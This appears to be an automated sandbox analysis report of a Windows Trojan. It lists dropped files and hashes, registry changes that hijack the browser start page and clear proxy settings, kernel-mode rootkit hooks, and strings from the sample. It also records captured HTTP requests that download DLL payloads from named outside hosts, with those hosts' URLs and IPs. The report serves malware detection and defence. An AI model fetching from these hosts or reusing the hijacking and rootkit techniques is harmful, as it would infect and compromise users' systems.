C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\8035BC2ABB17F717B57A550CC9E2EF7580417F69 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\165A82B735DDDE6F05E29A770A52297EAE982902 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\SN1VAMHK.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\YJCP8HIK.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\data_2 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\data_3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\data_0 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\data_1 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\98F3CC667C872833F2A93C841A531CD308BB708E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\2F56B586A819A62543E0EBD916F11DAAD2CCD424 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\BFEBBC0ACB3B39D75483B76F4E7AEC3C2D363FF5 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\0F161541D0AEA6CD932E2BF6FB045B97389F9A5A (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\ya_favicon_ru[1].ico (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-trackwhite-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozplugin-block-digest256.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\1I56O6EZ.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\7E882DAC0955721D3A046FDC6431463C3E3D0655 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\directoryLinks.json (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\HGQPYGV7.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B8A48CBFE22CD43A122B2A63C67009F5CC043432 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KE9BMB37.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\9UFT3VMU.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\svg[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\5902F6289661A11B83C4457A92FA159F59FE812E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\startupCache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\59A2A51D07303AA6BDB591966C4388DFB3BB359E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B73E4A4438B9B71F020E7D4B54AE283770E47CA7 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\4D8FDF1CF46B6BD4BCA2B32F05B47E51876D05AB (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\OfflineCache\index.sqlite (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\079225D0110CA684572A47D7287538AEB72DE9DD (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C9C0AB304A24D626A01D04F597B8F4DA1C0BB353 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\Yd__VnAFnBZBQiIS0sHoF6FGRC8[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\0VR58838.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\fc07_2[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozplugin-block-digest256.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\14926D90946B0F4BA2FCA38D75A5FBA83EF29AD0 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\D3620E4C550741E4DDAEC4D0AB078C93B1727686 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\45B87FD3EF6A4D430DA29B1C188A4A5FAFC69C3C (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\fc07[1].swf (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-malware-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\Tsv1TyvAx4g5KyOkiAdSP1Stniw[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\4F47793AB96483D552603451EF223EFE9EFAB646 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\doomed (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\CBA2520DD31049525B64F21BBF7476F4E2AC1945 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\59FYE1S2.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\_CACHE_CLEAN_ (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-block-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\752D7BD4AC91C2896126814F19AB222919A62B68 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\53EACA4C6576AB60F419E74ED41F7A38AECF13D3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000005 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000006 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000007 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\A2F1ABCE909764E5E04E373F145C9C3886BAF96B (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000002 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000003 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\97A235A1B13145568E910503A58B8E76054337B9 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\spacer[1].gif (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\startupCache\startupCache.4.little (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\8FF14B3918ED9F95C48889D4B31C7D7F6E5F0764 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\03Z3OHNC.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\49BE32824E0BEC3A9A307F5D676B110AE86F1525 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\G6NPTRAV.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\LXL295FY.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B7B9989DD0CA3B12797AAA0DED4830817A18AF46 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\CZKDRHGB.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\index (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C3357B699A03D6C47624A0BC4184ED6E2B8D6443 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B5C4975322F4602AB10B7CA78508940BDD035CA4 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\nearest[1].js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozstd-trackwhite-digest256.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\275130\pppHBGDF.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\E347EE129B65E7092ECAFB7CF75A62752357160F (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\PFR2GFQJ.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KK0IK9EV.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KCULDY7L.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\AE2CE72866097CB9D30937BE22EDFC3338CFF98D (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\0D043EB989F0FC6687A4FE1945189BE609121C27 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-track-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KJGZP41Y.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozstd-track-digest256.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C7BC478C975246AA379BD2F61AE321CCCC3810B9 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\70200C713D242B945A90D91BB201696C2691D293 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\6FD573E2D36B9D3C24362667556816AF31DA3541 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\84695AE0389FC766A8E02D06319A5484EC0EA303 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KUZ61ORW.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\Q5LVK3U2.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\VqEnvKPzCrM8a4pakUu0bzh7d9o[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-trackwhite-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\_CACHE_MAP_ (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\5D44AC703C53CC7EE6356F698FD1B03DA81FFE47 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\F8AC72083E334F70A553AE68455FBDF0E65C5221 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\2E78209F2BD7068695BB80AAE0D3E5F19A372BCA (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C489C169C7BEFDF8E1C92A8B42A536E07094BFB3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-forbid-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-phish-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\637008686606A1B97226747F72405A0455707B8C (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\f[1].txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\19829C5A0B960EA3263403EFD05B9EB93E557CA3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\Z40SB5AS.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000a (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\4A0EC69D76B2B80C39B49E6A9B3E7D14DFBD935B (0 bytes)

The process %original file name%.exe:2748 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\System32\AdN\ICZM.exe (1448729 bytes)
C:\Windows\System32\AdN\ÅäÖÃ.txt (21 bytes)

Registry activity

The process ICZM.exe:1388 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\services\ROkJy7CFKib]
"ErrorControl" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\ICZM_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\System\CurrentControlSet\services\ROkJy7CFKib]
"Start" = "3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\System\CurrentControlSet\services\ROkJy7CFKib]
"Devname" = "ROkJy7CFKib3"

[HKLM\SOFTWARE\Microsoft\Tracing\ICZM_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Internet Explorer\TabbedBrowsing]
"ShortcutBehavior" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\ICZM_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\ICZM_RASAPI32]
"EnableConsoleTracing" = "0"

[HKLM\System\CurrentControlSet\services\ROkJy7CFKib]
"ImagePath" = "\DosDevices\C:\Windows\system32\581eb\CDClient_EX.sys"
"Type" = "1"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Local Page" = "https://www.hao123.com/?tn=90117497_hao_pg"

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"

[HKLM\SOFTWARE\Microsoft\Tracing\ICZM_RASAPI32]
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\ICZM_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Internet Explorer\TabbedBrowsing]
"PopupsUseNewWindow" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\ICZM_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "https://www.hao123.com/?tn=90117497_hao_pg"

[HKLM\SOFTWARE\Microsoft\Tracing\ICZM_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\ICZM_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\ICZM_RASMANCS]
"FileTracingMask" = "4294901760"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following registry key(s):

[HKCU\Software\Microsoft\Internet Explorer\TypedURLs]
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process %original file name%.exe:2748 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

Dropped PE files

MD5 File path
89d67caa050c7cdcd0d25617570c5100 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\275130\BqwFFmwC.dll
a17a5ec133da2bf1ab01bf0db5ca66b0 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\275130\DAIwGxI.dll
bc5fb7fa78461d0d6c7834cdd89b0da2 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\275130\tAKAXflCv.dll
a4ec69fef9db60ebb32fe7ac0e65c1c0 c:\Windows\System32\AdN\ICZM.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

Using the driver "\DosDevices\C:\Windows\system32\581eb\aDVxAKMfkm1.sys" the Trojan controls creation and closing of processes by installing the process notifier.
Using the driver "entry 1 from table of Process notifiers, error 59" the Trojan controls creation and closing of processes by installing the process notifier.
Using the driver "\DosDevices\C:\Windows\system32\581eb\aDVxAKMfkm1.sys" the Trojan controls loading executable images into a memory by installing the Load image notifier.
Using the driver "\DosDevices\C:\Windows\system32\581eb\aDVxAKMfkm1.sys" the Trojan controls operations with a system registry by installing the registry notifier.
The Trojan installs the following kernel-mode hooks:

ZwTerminateProcess

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
CODE 4096 1015808 832000 5.54501 2554e9953e94316878f988dc38110d96
.rsrc 1019904 8192 5120 4.64099 444caef250ab8271ab9aac6f90911cac

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://www.58ad.cn/api/get?id=8618 119.97.143.20
hxxp://5636.ecoma.ourwebpic.com/d/CDClient.dll
hxxp://5636.ecoma.ourwebpic.com/d/Client.dll
hxxp://5636.ecoma.ourwebpic.com/d2/TD/x86.dll
hxxp://5636.ecoma.ourwebpic.com/
hxxp://www.go890.com/d/Client.dll 203.130.60.58
hxxp://www.go890.com/d/CDClient.dll 203.130.60.58
hxxp://www.ip138.com/ 203.130.60.58
hxxp://dld.jxwan.com/d2/TD/x86.dll 203.130.60.58
online.clnds.com 58.49.58.20
dns.msftncsi.com 131.107.255.255


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY PE EXE or DLL Windows file download HTTP
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

GET / HTTP/1.1
Host: VVV.ip138.com
Accept: text/html, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)


HTTP/1.1 200 OK
Date: Fri, 06 Oct 2017 04:52:28 GMT
Content-Length: 19152
Content-Type: text/html
Content-Location: hXXp://VVV.ip138.com/index.htm
Last-Modified: Mon, 25 Sep 2017 03:02:36 GMT
Accept-Ranges: bytes
ETag: "ccbfd8bdaa35d31:112f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 35631
X-Via: 1.1 PSbjwjBGP2ih137:2 (Cdn Cache Server V2.0), 1.1 dxin182:1 (Cdn Cache Server V2.0), 1.1 td48:7 (Cdn Cache Server V2.0)
Connection: keep-alive

<<< skipped >>>

GET /d/Client.dll HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: VVV.go890.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Fri, 06 Oct 2017 11:57:26 GMT
Server: kangle/2.9.6
Last-Modified: Thu, 05 Oct 2017 06:09:19 GMT
Content-Type: application/octet-stream
Content-Length: 916992
Age: 1
X-Via: 1.1 PShlamstdAMS1uv190:5 (Cdn Cache Server V2.0)
Connection: keep-alive

<<< skipped >>>

GET /api/get?id=8618 HTTP/1.1
Host: VVV.58ad.cn
Accept: text/html, */*
Accept-Encoding: gzip
User-Agent: Mozilla/3.0 (compatible; Indy Library)


HTTP/1.1 200
Server: nginx/1.4.4
Date: Fri, 06 Oct 2017 14:46:12 GMT
Content-Type: text/html;charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Encoding: gzip

<<< skipped >>>

GET /d2/TD/x86.dll HTTP/1.1
Host: dld.jxwan.com
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)


HTTP/1.1 200 OK
Date: Fri, 06 Oct 2017 08:24:34 GMT
Server: kangle/2.9.6
Last-Modified: Mon, 26 Dec 2016 01:17:53 GMT
Content-Type: application/octet-stream
Content-Length: 126464
Age: 1
X-Via: 1.1 PShlamstdAMS1uv190:8 (Cdn Cache Server V2.0)
Connection: keep-alive

<<< skipped >>>

GET /d/CDClient.dll HTTP/1.1
Host: VVV.go890.com
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)


HTTP/1.1 200 OK
Date: Fri, 06 Oct 2017 12:08:59 GMT
Server: kangle/2.9.6
Last-Modified: Fri, 01 Jul 2016 14:11:45 GMT
Content-Type: application/octet-stream
Content-Length: 26112
Age: 1
X-Via: 1.1 PShlamstdAMS1uv190:5 (Cdn Cache Server V2.0)
Connection: keep-alive

<<< skipped >>>

The Trojan connects to the servers at the following location(s):

ICZM.exe_1388:

.idata
.rdata
.reloc
.rsrc
.aspack
.adata
kernel32.dll
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
u%CNu
%s[%d]
KERNEL32.DLL
getservbyport
WSAAsyncGetServByPort
WSAJoinLeaf
WS2_32.DLL
127.0.0.1
TIdSocketListWindows
TIdStackWindowsU
IdStackWindows
%s, %.2d %s %.4d %s %s
%s, %d %s %d %s %s
TIdEncoder3to4.Encode: Calculated length exceeded (expected
%Program Files%\Borland\Delphi7\Source\Indy\Source\IdCoder3to4.pas
TIdEncoder3to4.Encode: Calculated length not met (expected
password
Password
IdHTTPHeaderInfo
ProxyPassword<
ProxyPort
Mozilla/3.0 (compatible; Indy Library)
ftpTransfer
ftpReady
ftpAborted
ClientPortMin<
ClientPortMax
Port
EIdCanNotBindPortInRange
EIdInvalidPortRangeSVW
libeay32.dll
ssleay32.dll
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_certificate_file
SSL_get_peer_certificate
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb_userdata
SSL_CTX_check_private_key
X509_STORE_CTX_get_current_cert
des_set_key
saUsernamePassword
Password<
0.0.0.1
TIdTCPConnection
TIdTCPConnectionp
IdTCPConnection
EIdTCPConnectionError
sslvrfFailIfNoPeerCert
TPasswordEvent
Certificate
RootCertFile
CertFile
KeyFile
OnGetPasswordD
EIdOSSLLoadingRootCertError
EIdOSSLLoadingCertError
EIdOSSLLoadingKeyError
UhB%C
TIdTCPClient
IdTCPClient
BoundPort
PortU
CommentURL
TIdHTTPMethod
IdHTTP
TIdHTTPOption
TIdHTTPOptions
TIdHTTPProtocolVersion
TIdHTTPOnRedirectEvent
TIdHTTPResponse
TIdHTTPResponsexWC
TIdHTTPRequest
TIdHTTPRequest0XC
TIdHTTPProtocolDYC
TIdCustomHTTP
TIdCustomHTTPDYC
TIdHTTP,[C
TIdHTTPtZC
HTTPOptions
EIdHTTPProtocolException
HTTPS
https
This request method is supported in HTTP 1.1
HTTP/1.0 200 OK
HTTP/
1.2.8
hXXp://VVV.hao123.com
$iegÍnor$b~g5zcn7yeme
TP...Error
SE...Error
C:\kclient
inflate 1.2.8 Copyright 1995-2013 Mark Adler
C:\Windows\System32\CDCLOG.txt
2017-10-06
17:46:14
17:46:13
?456789:;<=
!"#$%&'()* ,-./0123
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
GetCPInfo
version.dll
MsgWaitForMultipleObjects
shell32.dll
The procedure entry point %s could not be located in the dynamic link library %s
The ordinal %u could not be located in the dynamic link library %s
<requestedExecutionLevel level="requireAdministrator"/>
KWindows
IdTCPStream
 IdTCPServer
0IdHTTPHeaderInfo
UrlMon
1.0.3.27
Command not supported.
Address type not supported.$Error accepting connection with SSL.
Error creating SSL context. Could not load root certificate.
Could not load certificate.#Could not load key, check password.
SSL status: "%s"
Request rejected or failed.5Request rejected because SOCKS server cannot connect.QRequest rejected because the client program and identd report different user-ids.
Socket is not connected..Cannot send or receive after socket is closed.#Too many references, cannot splice.
Operation would block.
Operation now in progress.
Operation already in progress.
Socket operation on non-socket.
Protocol not supported.
Socket type not supported."Operation not supported on socket.
Protocol family not supported.0Address family not supported by protocol family.
&Error on loading Winsock2 library (%s)
Resolving hostname %s.
Connecting to %s.
Chunk StartedDThis authentication method is already registered with class name %s.
%s is not a valid service.
Socket Error # %d
%s is not a valid IP address.
